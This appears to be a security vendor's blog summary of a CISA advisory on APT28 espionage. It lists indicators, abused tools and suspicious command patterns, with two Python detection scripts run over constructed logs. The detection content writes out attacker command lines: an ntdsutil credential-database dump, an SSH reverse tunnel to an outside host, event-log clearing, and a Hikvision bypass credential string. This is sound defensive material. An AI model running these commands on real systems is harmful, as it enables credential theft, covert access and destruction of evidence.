
On May 21, 2025, CISA and international cybersecurity authorities issued CSA AA25-141A, attributing a sophisticated espionage campaign to GRU Unit 26165 (APT28/Fancy Bear). These operations have targeted logistics and IT support organizations involved in foreign aid to Ukraine.
Summary of Threat Campaign
APT28 uses diverse tactics to infiltrate and persist in networks, combining spearphishing, zero-day exploitation, credential attacks, and post-exploitation frameworks to exfiltrate sensitive operational data.
Common Techniques Used:
Initial Access
- Credential stuffing and brute-force attacks via Tor and commercial VPNs
- Spearphishing with links to spoofed login pages
- Exploitation of known vulnerabilities, including:
  - CVE-2023-23397 (Microsoft Outlook; leaks the user's Net-NTLMv2 hash via a crafted reminder pointing at an attacker UNC path)
  - CVE-2023-38831 (WinRAR; code execution when a user opens a benign-looking file inside a crafted archive)
  - Roundcube webmail: CVE-2020-12641, CVE-2020-35730, CVE-2021-44026
Lateral Movement & Persistence
- Deployment of the OpenSSH binary for command and control
- Use of publicly available tooling such as Impacket, PsExec, Certipy, and ADExplorer
- Lateral RDP access and NTDS.dit extraction
- Scheduled task creation with schtasks
Data Collection & Exfiltration
- Abuse of mailbox permissions for persistent email exfiltration
- Deletion of event logs with wevtutil
- Exfiltration using encrypted SSH tunnels
Indicators of Compromise (IOCs)
These indicators may no longer be under actor control or could involve shared infrastructure. Combine with behavioral heuristics for meaningful detection.
Known Exploited Email Accounts
- md-shoeb@alfathdoor[.]com[.]sa
- jayam@wizzsolutions[.]com
- accounts@regencyservice[.]in
- m.salim@tsc-me[.]com
- vikram.anand@4ginfosource[.]com
- mdelafuente@ukwwfze[.]com
- sarah@cosmicgold469[.]co[.]za
- franch1.lanka@bplanka[.]com
- commerical@vanadrink[.]com
- maint@goldenloaduae[.]com
- karina@bhpcapital[.]com
- tv@coastalareabank[.]com
- ashoke.kumar@hbclife[.]in
IP Addresses Used for Brute Force or Infrastructure
- 213.32.252.221, 124.168.91.178, 194.126.178.8, 159.196.128.120
Brute Forcing IPs (June - August 2024)
- June: 192.162.174.94, 207.244.71.84, 31.135.199.145...
- July: 79.184.25.198, 91.149.253.204, 103.97.203.29...
- August: 91.149.254.75, 91.149.255.122, 91.149.255.195...
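The note above that these indicators may be stale or shared says the practical thing: match the IP list, but alert on behaviour. As an added example (not from the advisory and not Critical Path Security's own tooling), the Python below runs two simple heuristics over a constructed webmail authentication log: a sliding-window count of failed logins per source, which catches the fast brute force, and a count of distinct accounts per source, which catches the low-and-slow password spray that never trips a per-window threshold. Membership in the page's July 2024 IP list is recorded as a flag on the alert rather than required for it, so new infrastructure is still caught. The log format, thresholds, window size, hostnames and addresses other than the three page-listed IPs are assumptions for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Brute-force source IPs from this page's July 2024 list (the page truncates the
# list with "..."; only the three addresses it shows are used here).
KNOWN_BRUTE_FORCE_IPS = {"79.184.25.198", "91.149.253.204", "103.97.203.29"}

WINDOW = timedelta(minutes=10)  # sliding window for failure counting (assumed)
FAIL_THRESHOLD = 10             # failures from one source within WINDOW (assumed)
SPRAY_THRESHOLD = 5             # distinct accounts tried by one source (assumed)

# Assumed webmail authentication log format, one event per line.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")


def parse(lines):
    """Yield parsed events; lines that do not match the format are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
                   "src": m["src"], "user": m["user"], "result": m["result"]}


def detect(lines):
    """Return one alert per source that either fails FAIL_THRESHOLD times inside
    WINDOW or tries SPRAY_THRESHOLD distinct accounts. IOC membership is a flag,
    not a precondition, so previously unseen infrastructure is caught too."""
    by_src = defaultdict(list)
    for ev in parse(lines):
        by_src[ev["src"]].append(ev)
    alerts = []
    for src, evs in by_src.items():
        fails = sorted(e["ts"] for e in evs if e["result"] == "FAIL")
        accounts = {e["user"] for e in evs if e["result"] == "FAIL"}
        max_in_window, start = 0, 0
        for end in range(len(fails)):           # two-pointer sliding window
            while fails[end] - fails[start] > WINDOW:
                start += 1
            max_in_window = max(max_in_window, end - start + 1)
        reasons = []
        if max_in_window >= FAIL_THRESHOLD:
            reasons.append(f"{max_in_window} failures within {WINDOW}")
        if len(accounts) >= SPRAY_THRESHOLD:
            reasons.append(f"{len(accounts)} distinct accounts targeted")
        if reasons:
            alerts.append({"src": src, "max_failures_in_window": max_in_window,
                           "distinct_accounts": len(accounts),
                           "known_ioc": src in KNOWN_BRUTE_FORCE_IPS, "reasons": reasons})
    return sorted(alerts, key=lambda a: a["src"])


def constructed_log():
    """Constructed log (not real data): a low-and-slow spray from a page-listed IP,
    a fast single-mailbox brute force from an unlisted IP, and a user who mistypes."""
    base = datetime(2024, 7, 14, 2, 0, 0)
    fmt = "{ts:%Y-%m-%dT%H:%M:%SZ} src={src} user={user} result={res}"
    lines = [fmt.format(ts=base + timedelta(minutes=4 * i), src="91.149.253.204",
                        user=f"user{i}@example.org", res="FAIL") for i in range(8)]
    lines += [fmt.format(ts=base + timedelta(seconds=15 * i), src="203.0.113.50",
                         user="finance@example.org", res="FAIL") for i in range(11)]
    lines += [fmt.format(ts=base + timedelta(minutes=1, seconds=20 * i), src="198.51.100.20",
                         user="bob@example.org", res=r)
              for i, r in enumerate(["FAIL", "FAIL", "OK"])]
    return sorted(lines)


if __name__ == "__main__":
    for a in detect(constructed_log()):
        tag = "KNOWN IOC" if a["known_ioc"] else "new source"
        print(f"{a['src']:<16} {tag:<10} {'; '.join(a['reasons'])}")
```

Run against the constructed log, the spraying IOC address never exceeds three failures in any ten-minute window and would be missed by the failure count alone; it is the distinct-account rule that fires. Tune both thresholds to your own baseline before deploying, and feed the source list from a vetted block list rather than hard-coding it.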
Common Webmail Domains:
- portugalmail[.]pt
- mail-online[.]dk
- email[.]cz
- seznam[.]cz
Known Malicious Archive Filenames
- calc.war.zip
- news_week_6.zip
- Roadmap.zip
- SEDE-PV-2023-10-09-1_EN.zip
- Zeyilname.zip
Malicious Scripts & Living-off-the-Land (LOTL) Tactics
APT28 actors use legitimate tools in unauthorized ways. Organizations should monitor:
LOTL Binaries
- Credential access, persistence, and anti-forensics: ntdsutil, wevtutil, vssadmin, ADExplorer, schtasks, OpenSSH
- Host and network reconnaissance: whoami, tasklist, hostname, arp, systeminfo, net, wmic
- Permissions, tunneling, and registry: cacls, icacls, ssh, reg
Malicious Scripts and Tools
- Certipy – AD Certificate Services enumeration and abuse
- Get-GPPPassword.py – harvests credentials stored in insecure Group Policy Preferences
- ldap-dump.py – AD user enumeration over LDAP
- Hikvision backdoor detection string: YWRtaW46MTEK (base64 of "admin:11" followed by a newline; this is the credential string used in the well-known Hikvision authentication bypass, so look for it in HTTP requests to camera web interfaces)
Suspicious Command Patterns
- edge.exe "-headless-new -disable-gpu" (headless browser launched from the command line)
- ntdsutil.exe "activate instance ntds" ifm "create full C:\\temp\\[a-z]{3}" quit quit (Install-From-Media dump of NTDS.dit; the pattern is written as a regex, with [a-z]{3} standing for the observed three-letter folder name)
- ssh -Nf (backgrounded SSH session with no remote command, i.e. a tunnel)
- schtasks /create /xml (scheduled task registered from an XML definition)
Heuristics and behavioral analytics should accompany rule-based detection to limit false positives from benign admin actions.
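As an added example (not from the advisory and not Critical Path Security's own detection content), the Python below turns the command patterns above into regex rules, tags events whose image is one of the LOTL binaries listed earlier, and escalates a (host, user) pair only when several distinct reconnaissance binaries run together, which is the kind of behavioural layering the sentence above asks for. It runs over a constructed set of process-creation events in Sysmon Event ID 1 / Security 4688 style. The regexes, the recon threshold, the severity labels, and every hostname, username and address in the sample are assumptions for illustration; the rules are not official signatures.

```python
import re
from collections import defaultdict

# LOTL binaries listed on this page (lower-case, no .exe). "ssh" covers the
# OpenSSH client the actors deploy; ADExplorer runs as adexplorer.exe.
LOTL_BINARIES = {
    "ntdsutil", "wevtutil", "vssadmin", "adexplorer", "schtasks", "ssh",
    "whoami", "tasklist", "hostname", "arp", "systeminfo", "net", "wmic",
    "cacls", "icacls", "reg",
}
# Recon binaries are noisy alone; only a cluster from one (host, user) escalates.
RECON_BINARIES = {"whoami", "tasklist", "hostname", "arp", "systeminfo", "net", "wmic"}
RECON_THRESHOLD = 3  # distinct recon binaries per (host, user); assumed value

# Regex forms of the page's suspicious command patterns (assumed regexes).
RULES = [
    ("ntdsutil_ifm_dump", re.compile(
        r'ntdsutil(\.exe)?\s+"?activate instance ntds"?\s+ifm\s+"?create\s+full\b', re.I)),
    ("ssh_background_tunnel", re.compile(r'\bssh(\.exe)?\b.*\s-(?:Nf|fN)\b', re.I)),
    ("schtasks_create_from_xml", re.compile(r'\bschtasks(\.exe)?\b.*/create\b.*/xml\b', re.I)),
    ("edge_headless", re.compile(r'edge\.exe.*-headless[-=]new.*-disable-gpu', re.I)),
    ("eventlog_clear", re.compile(r'\bwevtutil(\.exe)?\s+(?:cl|clear-log)\b', re.I)),
]


def _ev(host, user, image, cmdline):
    return {"host": host, "user": user, "image": image, "cmdline": cmdline}


# Constructed process-creation events (Sysmon EID 1 / Security 4688 style).
# Hostnames, users and addresses are fictitious.
SAMPLE_EVENTS = [
    _ev("WS-114", r"CORP\jdoe", r"C:\Windows\System32\whoami.exe", "whoami /all"),
    _ev("WS-114", r"CORP\jdoe", r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    _ev("WS-114", r"CORP\jdoe", r"C:\Windows\System32\net.exe",
        'net group "domain admins" /domain'),
    _ev("DC-01", r"CORP\svc-backup", r"C:\Windows\System32\ntdsutil.exe",
        r'ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\abc" quit quit'),
    _ev("WS-114", r"CORP\jdoe", r"C:\Windows\System32\OpenSSH\ssh.exe",
        "ssh -Nf -R 2222:127.0.0.1:3389 user@198.51.100.7"),
    _ev("WS-114", r"CORP\jdoe", r"C:\Windows\System32\schtasks.exe",
        r"schtasks /create /xml C:\Users\Public\task.xml /tn Updater"),
    _ev("WS-220", r"CORP\mlee", r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
        r'"msedge.exe" -headless-new -disable-gpu http://203.0.113.9/x'),
    _ev("WS-220", r"CORP\mlee", r"C:\Windows\System32\wevtutil.exe", "wevtutil cl Security"),
    _ev("FS-02", r"CORP\admin", r"C:\Windows\System32\schtasks.exe", "schtasks /query /fo LIST"),
]


def image_name(path):
    """Basename of a Windows image path, lower-cased, without '.exe'."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def _finding(rule, severity, ev):
    return {"rule": rule, "severity": severity, "host": ev["host"],
            "user": ev["user"], "cmdline": ev["cmdline"]}


def evaluate(events):
    """Apply the command-line rules to every event (severity high), report LOTL
    binaries that match no rule as info only, and add one medium 'recon_cluster'
    finding per (host, user) that runs RECON_THRESHOLD distinct recon binaries."""
    findings = []
    recon_seen = defaultdict(set)
    for ev in events:
        binary = image_name(ev["image"])
        hit = False
        for name, rx in RULES:
            if rx.search(ev["cmdline"]):
                findings.append(_finding(name, "high", ev))
                hit = True
        if binary in RECON_BINARIES:
            recon_seen[(ev["host"], ev["user"])].add(binary)
        elif binary in LOTL_BINARIES and not hit:
            findings.append(_finding("lotl_binary", "info", ev))
    for (host, user), bins in recon_seen.items():
        if len(bins) >= RECON_THRESHOLD:
            findings.append({"rule": "recon_cluster", "severity": "medium", "host": host,
                             "user": user, "cmdline": ", ".join(sorted(bins))})
    return findings


def summarize(findings):
    """Count findings per severity."""
    counts = defaultdict(int)
    for f in findings:
        counts[f["severity"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"[{f['severity']:>6}] {f['rule']:<26} {f['host']} {f['user']}: {f['cmdline']}")
```

The admin's `schtasks /query` on FS-02 is recorded but never paged, while the same binary with `/create /xml` is; likewise a single `whoami` is ignored, but three different recon tools from one user on one host produce a medium finding. That split between pattern matches, informational tagging and clustering is where most of the false-positive reduction comes from.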
Recommended Actions
- Patch all systems vulnerable to CVEs mentioned
- Block and monitor IPs/IP ranges after vetting
- Hunt for suspicious uses of LOTL binaries
- Monitor archive extraction from email and webmail providers above
- Implement alerting on suspicious command line behavior
- Audit mailbox permissions for privilege abuse
- Segment and monitor access to IP cameras and other embedded or ICS/SCADA interfaces (the Hikvision backdoor string above is one indicator to watch for)
References
- CISA Advisory AA25-141A
- MITRE ATT&CK: APT28
- Living Off the Land Guidance (CISA/NSA)
- Certipy GitHub
- Outlook CVE-2023-23397
- WinRAR CVE-2023-38831
- Roundcube CVEs
Critical Path Security continuously tracks advanced persistent threats and works with clients to build layered detection models that account for actor TTPs and subtle network deviations.
Reach out to our team for proactive assessments and defense-in-depth strategy engagements.